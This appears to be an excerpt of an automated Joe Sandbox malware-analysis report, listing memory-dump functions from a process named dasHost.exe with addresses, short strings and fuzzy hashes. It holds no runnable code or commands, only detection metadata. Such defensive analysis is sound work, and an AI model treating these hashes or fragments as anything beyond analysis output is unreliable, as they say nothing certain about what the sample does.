Memory Dump Source

Source File: 00000012.00000002.2162018156.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f30000_ihpxTeRPVLYTpFZNVeq.jbxd

Similarity

API ID:
String ID: "$K$X$u
API String ID: 0-3928554183
Opcode ID: 838f069e65b1ae78b035105daf38c9be24bccfad0c4d593026daa602bd555073
Instruction ID: 1d818bb1c7f978a84fe424370ee1fd46169ea9377553a1dd80d5e24be14837e9
Opcode Fuzzy Hash: 838f069e65b1ae78b035105daf38c9be24bccfad0c4d593026daa602bd555073
Instruction Fuzzy Hash: 4631B470D086698FEB68EF04C8947EEB7B1BF54342F5041AAD40DA22D0CB786AD4CF49

Analysis Process: dasHost.exePID: 6656, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848F4D54A Relevance: 2.9, Strings: 2, Instructions: 389COMMON

Download Yara Rule

Strings

p\H, xrefs: 00007FF848F4D652
NH, xrefs: 00007FF848F4D5E4

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f4a000_dasHost.jbxd

Similarity

API ID:
String ID: NH$p\H
API String ID: 0-1232786254
Opcode ID: bdf325521d919597e26b392c04009dc8f5e275d59d39e9e36a057f1ea3f781aa
Instruction ID: 55b55d87fbf451aa6c10c783277bec8f3779dcab4fec818d370718824813e451
Opcode Fuzzy Hash: bdf325521d919597e26b392c04009dc8f5e275d59d39e9e36a057f1ea3f781aa
Instruction Fuzzy Hash: A8E13A71D19A599FEB98EB68D4957B8B7B1FF68740F1401BAD00DE32D6CB386880CB44

Function 00007FF848F43575 Relevance: 1.5, Strings: 1, Instructions: 228COMMON

Download Yara Rule

Strings

K_H, xrefs: 00007FF848F4375D

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f40000_dasHost.jbxd

Similarity

API ID:
String ID: K_H
API String ID: 0-313846638
Opcode ID: 30b696bd95fcd8bc488d36fba6b79db9bad2dceb6a6c4bdc43f60179dc976674
Instruction ID: 19d8043fbf7206d13ed566c4760b4dc66cc2b850a29814b6337daf5be5dd2b04
Opcode Fuzzy Hash: 30b696bd95fcd8bc488d36fba6b79db9bad2dceb6a6c4bdc43f60179dc976674
Instruction Fuzzy Hash: E471BE71D1CA4A8FEB98EB2CC459BADBBE0FF69750F54017AC009D72D2DF2868408B05

Function 00007FF848F54D3D Relevance: 1.4, Strings: 1, Instructions: 182COMMON

Download Yara Rule

Strings

8mH, xrefs: 00007FF848F54E4A

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f51000_dasHost.jbxd

Similarity

API ID:
String ID: 8mH
API String ID: 0-1362847371
Opcode ID: 913b34d270f657b007ee4e14de13fc6c2ef3c72a320e41628f97243cb0791211
Instruction ID: 4e304820299def7a0da7eef854357c4297aa5d51b7942b1b2fc4d510eaffd001
Opcode Fuzzy Hash: 913b34d270f657b007ee4e14de13fc6c2ef3c72a320e41628f97243cb0791211
Instruction Fuzzy Hash: AB510C70D18A5D8FEB94EB68D8597ADBBF1FF68340F5001AAD00DE7296DF3468858B40

Function 00007FF848F54D50 Relevance: 1.4, Strings: 1, Instructions: 162COMMON

Download Yara Rule

Strings

8mH, xrefs: 00007FF848F54E4A

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f51000_dasHost.jbxd

Similarity

API ID:
String ID: 8mH
API String ID: 0-1362847371
Opcode ID: 3f32c01a43a33af55ee1bed3ebe5c60d37e7d7e67c7a12ba1844898d400c8f49
Instruction ID: f21d306b15dd936fe11c0ecc3787363ed4c2fc75aa61d2bfe30dc18bfea721e3
Opcode Fuzzy Hash: 3f32c01a43a33af55ee1bed3ebe5c60d37e7d7e67c7a12ba1844898d400c8f49
Instruction Fuzzy Hash: 09510A70D18A6D9FEF94EB68D855BADBBF1FB68340F40016AD00DE3296DF3468858B40

Function 00007FF848F53842 Relevance: 1.4, Strings: 1, Instructions: 120COMMON

Download Yara Rule

Strings

@, xrefs: 00007FF848F538D3

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f51000_dasHost.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: be01325391aee519f05b81bbc67deb8f4b09bd427a3351eb7309a0781ca77efb
Instruction ID: 4205e4e043e9a47b89140de4ad2c4f9f14cc4ddf5e34bc2c8c3f687ccc0e287b
Opcode Fuzzy Hash: be01325391aee519f05b81bbc67deb8f4b09bd427a3351eb7309a0781ca77efb
Instruction Fuzzy Hash: 3441A470D08A1D9EDBA4EF5CD894BECB7B1EB59340F5041BAD00DE3292DB7869848F58

Function 00007FF848F40A01 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

0vH, xrefs: 00007FF848F40A70

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f40000_dasHost.jbxd

Similarity

API ID:
String ID: 0vH
API String ID: 0-2857910901
Opcode ID: a86cbc85cd1e68d2047279119a1191d7b3347bf85ba2c859eb339672c9c821ae
Instruction ID: f35577d04eea3c2e1a8547c1be2f27ea317211a43f95ead17345c84438c575d9
Opcode Fuzzy Hash: a86cbc85cd1e68d2047279119a1191d7b3347bf85ba2c859eb339672c9c821ae
Instruction Fuzzy Hash: 22115B3191894E9EE780FB68C8491BA7BE1FFA8790F4005B6D818E6192EF78A5448740

Function 00007FF848F4124D Relevance: 1.3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

Strings

hyH, xrefs: 00007FF848F412BD

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f40000_dasHost.jbxd

Similarity

API ID:
String ID: hyH
API String ID: 0-3369426750
Opcode ID: 553f3ce69f25b487b8df264033a2ac5f292c9f15c63fa15b723afc54de8d9cfe
Instruction ID: b4b0cb757f2a4af3a27eb1a056c360173cc95f9dc74f782afe2684a0ad32c775
Opcode Fuzzy Hash: 553f3ce69f25b487b8df264033a2ac5f292c9f15c63fa15b723afc54de8d9cfe
Instruction Fuzzy Hash: 2211E230D0C55A8EEB59AB64C4682F97BE0FF69741F0401BAC40AE20D2EF246680C710

Function 00007FF848F41260 Relevance: 1.3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

Strings

hyH, xrefs: 00007FF848F412BD

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f40000_dasHost.jbxd

Similarity

API ID:
String ID: hyH
API String ID: 0-3369426750
Opcode ID: 341d98e167e533bd1288782d2bfec9c867fb87754b74b0fba03211308ed85270
Instruction ID: 159b8d88f3f2c90b5228a2c0ccbae0e7a7d0a68b6a67d731fee2e979f050c396
Opcode Fuzzy Hash: 341d98e167e533bd1288782d2bfec9c867fb87754b74b0fba03211308ed85270
Instruction Fuzzy Hash: 2CF0A430D0D56F8EEB94AB6488182F977E4FF65755F04057AD40EE20D2EF245694C650

Function 00007FF848F4DC2C Relevance: 1.3, Strings: 1, Instructions: 24COMMON

Download Yara Rule

Strings

7, xrefs: 00007FF848F4DC3C

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f4a000_dasHost.jbxd

Similarity

API ID:
String ID: 7
API String ID: 0-3263691068
Opcode ID: dbf785b1a8c8dc9d329b782a11f09611344dbc6f22019adfd0e38253fb9d8ae5
Instruction ID: b2d66d9d688eba58505978bb88bb25c3217e5b6bc78d13c46d7ce9b2da6707c5
Opcode Fuzzy Hash: dbf785b1a8c8dc9d329b782a11f09611344dbc6f22019adfd0e38253fb9d8ae5
Instruction Fuzzy Hash: F3F0D470D082199FEB14EF95C490AADB7B1EF64751F00412AE406A33C5DB786546CF55

Function 00007FF848F52E8D Relevance: .5, Instructions: 456COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f51000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b04a3018cb165794a31602a6378a0217391055b2679be9aaa21ae353eca43dd
Instruction ID: 202736bf3158e3c26c0e8879b055482fb31b4ebd05179f4335f7a14071fc373c
Opcode Fuzzy Hash: 5b04a3018cb165794a31602a6378a0217391055b2679be9aaa21ae353eca43dd
Instruction Fuzzy Hash: 5F114C31D0D68A9EE742AB3C88591A9BBF0FF16340F0905B6D459CB0E3DA28A9448762

Function 00007FF848F5342F Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f51000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbb7db770f4e6de5f456096f431ae63d22e0211ebac70c07587b86f30252a67e
Instruction ID: 707a42bc70a1ce1f4985e0cddc76c8efd9606870337fd03fac69292e33a50144
Opcode Fuzzy Hash: dbb7db770f4e6de5f456096f431ae63d22e0211ebac70c07587b86f30252a67e
Instruction Fuzzy Hash: 8591E63771E95A9EE301B77CF8955E9BBA0FF853B9F140377D188CA083DA18604987A4

Function 00007FF848F41748 Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f40000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98b2fedffe03277b78962a79159410493df8611970c019d5d61ec84e60f24e81
Instruction ID: 29f1f6ae0991f4d08bc090cfcd7a84a12c1c5bfef02e12d106ce00ee4d08166f
Opcode Fuzzy Hash: 98b2fedffe03277b78962a79159410493df8611970c019d5d61ec84e60f24e81
Instruction Fuzzy Hash: 5981BD31A0CA598FDB98EF1898556B977E2FFA8B50F14057AD44DD32C2CF34AC428785

Function 00007FF848F40D37 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f40000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d818d996aa1d71f1fa0d473840d275df2a90c5d4b7d78e32334d705f1d111c2f
Instruction ID: 13d362c9714756cf85fa85ab42c98ef8688b89023138eba2aad428dd330a44d1
Opcode Fuzzy Hash: d818d996aa1d71f1fa0d473840d275df2a90c5d4b7d78e32334d705f1d111c2f
Instruction Fuzzy Hash: CA81B071D099198EEB94FB28C815BE9B7B1FFA4750F0042BAD40DE71D2DF3869868B44

Function 00007FF848F41D0D Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f40000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e317dd37d234dc7519de6289bbc2df7c861a19ae2c5c06528a3d1da729ac7e96
Instruction ID: fb99c2a007a073c8768c109780ea5b5ec5038c58e92f01a74efb912a624a8a8c
Opcode Fuzzy Hash: e317dd37d234dc7519de6289bbc2df7c861a19ae2c5c06528a3d1da729ac7e96
Instruction Fuzzy Hash: 0351DF31A1CA9A8FDB48EF1888545BA77E2FFA8750F14057ED44AD3282CF35E8428785

Function 00007FF848F51BBD Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f51000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7957d178972e9e44c6fa07e35cc0b5de32b16730caab02b70ba62a20402806ba
Instruction ID: f302f13976e9b9f295c2659a123f59b50454ff15d0fadde17147f335b5faa146
Opcode Fuzzy Hash: 7957d178972e9e44c6fa07e35cc0b5de32b16730caab02b70ba62a20402806ba
Instruction Fuzzy Hash: 7551B770918A5D8FEB98EF58C494BA9B7B2FF68744F1001A9D40DE7296DF35A881CF04

Function 00007FF848F43255 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f40000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0be72da3bea920dad34161ce1dbde7d3ce7557cc4e6d5851eba6a9bc471f8a2b
Instruction ID: eba974c8fda838352f3e19f92db6507d9fcafd9b5956b1a4a6de8b1d5e841982
Opcode Fuzzy Hash: 0be72da3bea920dad34161ce1dbde7d3ce7557cc4e6d5851eba6a9bc471f8a2b
Instruction Fuzzy Hash: AD513570D0C5198FEB54EBA8C858AFDBBB1EF68340F40007AD009E72D2DB38A944CB14

Function 00007FF848F42125 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f40000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37105d49513776e82851b478c8677cedc594802940a86c4378446662256aa6bf
Instruction ID: 6c81967691863a136b2ad130dbe5d8c1b0c2b81999bdd079494c452434003d05
Opcode Fuzzy Hash: 37105d49513776e82851b478c8677cedc594802940a86c4378446662256aa6bf
Instruction Fuzzy Hash: 29413731D0D68A4FE345EB7888551B9BBE0EFA5780F0400BBD40DD71E2DF28A9418365

Function 00007FF848F536C5 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f51000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61bae736ddbcc88e0dd190810cde9991420ac5f9622dfef4c00a88accea540b0
Instruction ID: 7c8b000751fbb842358ccfc24204a0cfd3ca6f52f2ad4bdf1a9598dd214abd58
Opcode Fuzzy Hash: 61bae736ddbcc88e0dd190810cde9991420ac5f9622dfef4c00a88accea540b0
Instruction Fuzzy Hash: 9E413970D0CA1D9EEB95EB6CC8597A9B6B1FF5A340F8041BAD00DD3292DF3469808F15

Function 00007FF848F4BD72 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f4a000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12df53ae341dbd0f202cd03dbce509aebce48c345bb6e7d4dc2e1ae8c4024f10
Instruction ID: 744e41d517fd7ec3096f4e86755e594b7195e100e27fbae11389b490cc39e5be
Opcode Fuzzy Hash: 12df53ae341dbd0f202cd03dbce509aebce48c345bb6e7d4dc2e1ae8c4024f10
Instruction Fuzzy Hash: C031D871E1C91D9EEB94EBA89895AFCB7B1FFA8740F50413AD00DE3282DF2468418B44

Function 00007FF848F4C4FB Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f4a000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc5e994b8face754e54bb71ae0bb49c414a47f2119c2c7e72acee3f16b4c0ca6
Instruction ID: 556e6993cc60730edec7c1ba119466806fe9cfdf59e920680eb51a4ce6d76458
Opcode Fuzzy Hash: bc5e994b8face754e54bb71ae0bb49c414a47f2119c2c7e72acee3f16b4c0ca6
Instruction Fuzzy Hash: 2F318F32D1E65A5EE752B7A8B8051FD77A0FF71BA4F041377E04C991D2EF2C24408269

Function 00007FF848F4BDEA Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f4a000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97e5dac96a3a1a178487280a97322ae87d8b07c6a11ddcf609c411fffbd2f6d9
Instruction ID: c77dd40c10756c029251a823c83a48ed7bfd14937df300a9c08c88376d6aadcb
Opcode Fuzzy Hash: 97e5dac96a3a1a178487280a97322ae87d8b07c6a11ddcf609c411fffbd2f6d9
Instruction Fuzzy Hash: F721C871E1C91D8FEB94FBA898956ACB7B1FFA9740F50013AD10DE7282DF2468418B44

Function 00007FF848F437BA Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f40000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d55e140fc30f04924b9b4b142d70155027ad73569d203e50392d5a372a833ddb
Instruction ID: e9d126e245ba31d316fbd7a85e41f7b85dbde0f7f7a3faf9e9e3b786e26f0f21
Opcode Fuzzy Hash: d55e140fc30f04924b9b4b142d70155027ad73569d203e50392d5a372a833ddb
Instruction Fuzzy Hash: 3E31AF7290EA0E8FE748DF2CD8547AABFE1EB95364F50027EC009D72CACBB914058B40

Function 00007FF848F535D3 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f51000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03241aeb37acb945254e3fb7bda46bb96275ec650a1a1ef88bff7887b6a56d33
Instruction ID: 964276ca838fcb6cb3749ad528ac78b24f50b34257c1fb49132aad75204a3d2c
Opcode Fuzzy Hash: 03241aeb37acb945254e3fb7bda46bb96275ec650a1a1ef88bff7887b6a56d33
Instruction Fuzzy Hash: 65210732A0E58A4FF751BB2CA8552E9FBA0FF42364F4406BBD548CA183EB285404C764

Function 00007FF848F4BCC9 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f4a000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3201184c3f175a742127fa760b557bfb8d4868914826bc80d4960c1f6f8c21a
Instruction ID: a46ef0c1be946f82723b607b0a384af3893d19804dc9b551dcca39976e275334
Opcode Fuzzy Hash: a3201184c3f175a742127fa760b557bfb8d4868914826bc80d4960c1f6f8c21a
Instruction Fuzzy Hash: F831767091C6498FEB55EBA4C8587A97BF1EF29700F0005BBC009E72D2DB39A944CB45

Function 00007FF848F524C1 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f51000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8895efba1241aa45490f6ad66d981bb44dafd374a3db93a884cda63d15e723c
Instruction ID: 7474731ccbaf17a24189aff9ee1153e3d9647b5abff50019dfc72689e5377a5f
Opcode Fuzzy Hash: c8895efba1241aa45490f6ad66d981bb44dafd374a3db93a884cda63d15e723c
Instruction Fuzzy Hash: 05216970D0C6098EEB55EBA4D8186EDB6F2EF18340F00427AD009E71D2EB38A944CB28

Function 00007FF848F4084D Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f40000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9950c4b7d7dc73603d01a8ae6cae9505a220bd37509a16078299484684cb50c1
Instruction ID: 12b67119130b4cafc433b5a155f22f1b9c1549d8723f2d4e627d999f20fc3d3b
Opcode Fuzzy Hash: 9950c4b7d7dc73603d01a8ae6cae9505a220bd37509a16078299484684cb50c1
Instruction Fuzzy Hash: FD113131D0C68A9FF785BBB888495E97BE0FFA5B40F2404B3D808E60D3EA24A445C284

Function 00007FF848F43450 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f40000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c100853376c1805ea93c189a7577e251945f0e4fe8c39a44d157bd0aabe72656
Instruction ID: dcbf77c736d9c1eebbac0ae7fbfc9131497b776fb40cebeb475501de2008a832
Opcode Fuzzy Hash: c100853376c1805ea93c189a7577e251945f0e4fe8c39a44d157bd0aabe72656
Instruction Fuzzy Hash: A621AF3084E68A4FD743AB78885C9E97FF4EF5B300F0944EBD449CB1A2DB28A556C711

Function 00007FF848F4C468 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f4a000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7570f7e5f61507548458f456099607ba42136a57b858b7f0fa004c5bde08bc6b
Instruction ID: e73c8c9846e94fcbe51d36c3e05c3a0918398433ee8404e400c8ee56ff52f52e
Opcode Fuzzy Hash: 7570f7e5f61507548458f456099607ba42136a57b858b7f0fa004c5bde08bc6b
Instruction Fuzzy Hash: 1611B63691DA56ADEB55BA6CB8429FD3360FF207E4F0417B3D41CCA0C3EF2868464658

Function 00007FF848F52D09 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f51000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22c9af3f7d3596597636b3e3dff3414ba5ff5726e4a56cb2db0e7a9999035442
Instruction ID: 987dd92b4501d64b6cabd27b15e0dfe4cecb5de362a2e925c373863cfb2f6695
Opcode Fuzzy Hash: 22c9af3f7d3596597636b3e3dff3414ba5ff5726e4a56cb2db0e7a9999035442
Instruction Fuzzy Hash: BC21D53080D68A9FE742E7A488596A9BFF0FF1A340F0405FAD448C71A7DB789544C751

Function 00007FF848F52051 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f51000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dac81e8d13ed02ae48ac9b760201144bd431318339f407fbe8d896ce285cb077
Instruction ID: f043546a0f039c13270c47fd8a26050f6fe9188ba3b4aecae8ef424c16ca8a73
Opcode Fuzzy Hash: dac81e8d13ed02ae48ac9b760201144bd431318339f407fbe8d896ce285cb077
Instruction Fuzzy Hash: 2A11BE7090D2898FDB48EF28C4A51FDBBA1FF58344F1102BEE80AC3682DB34A440CB85

Function 00007FF848F56881 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f51000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dd3409822dd34c116a46bcb9153d1bc3ff24cd21f1b13f30c41f4f276df85bd
Instruction ID: 84590856d6ae33e1dcd7bbe10e5d56d1024dfe188cd7fc44690ca47df5a9ea54
Opcode Fuzzy Hash: 1dd3409822dd34c116a46bcb9153d1bc3ff24cd21f1b13f30c41f4f276df85bd
Instruction Fuzzy Hash: CC11843090D64E9FDB99EF28845A6BDBBB0FF68341F1405BAD419C61D2EF39A444C741

Function 00007FF848F56925 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f51000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3de08aed4b44ba33b8cf686912aa0b3e7375cd65d293766136371014e1834857
Instruction ID: 1eb3a0859fd72aa5c70257737156a2dedfdaa9b61b6e0199f3a4827e11166ff8
Opcode Fuzzy Hash: 3de08aed4b44ba33b8cf686912aa0b3e7375cd65d293766136371014e1834857
Instruction Fuzzy Hash: AF11A23090D64E8FDB99EF2884592BDBBA0FF69381F0405BED419C31D2DB39A444C741

Function 00007FF848F541F9 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f51000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6276a6bb9c611414edd8127b813f937679a3ba9f380cda3215aa3d45c2eff20
Instruction ID: 12a41b3d9b371a7a3f3b0431e254f15a3325e92996d9e6827e35ae93c13768b4
Opcode Fuzzy Hash: f6276a6bb9c611414edd8127b813f937679a3ba9f380cda3215aa3d45c2eff20
Instruction Fuzzy Hash: 86119D7080DA5E9FDB49EF2884592B97BB0FF69301F0005BBD419C75D2DB38A484C751

Function 00007FF848F54295 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff848f51000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58d7cb8e99f23e6f50045cf15c739db0d163434e1a7f2370b7b8ecc485826674
Instruction ID: df05a85935d131818a1f54245d5b1a201d3b938a726a12ec4e0a15149e815129
Opcode Fuzzy Hash: 58d7cb8e99f23e6f50045cf15c739db0d163434e1a7f2370b7b8ecc485826674
Instruction Fuzzy Hash: 6D11AF7090D65E9FEB89EF6884592B9BBA0FF68341F0005BED409C31D2DB79A444C790

Function 00007FF848F54735 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2219162231.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

